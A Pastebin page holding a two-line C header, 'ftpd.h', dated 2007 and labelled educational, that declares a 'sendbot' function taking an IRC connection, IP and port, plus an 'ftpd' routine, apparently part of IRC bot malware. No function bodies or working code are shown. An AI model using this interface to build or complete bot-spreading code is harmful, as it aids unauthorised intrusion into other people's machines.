Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- * ftpd.h 2007 Ravo_5002
- * This code is for educational purposes only...
- */
- int sendbot(SOCKET ircconn, char *ip,int port);
- unsigned long ftpd(void *s);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement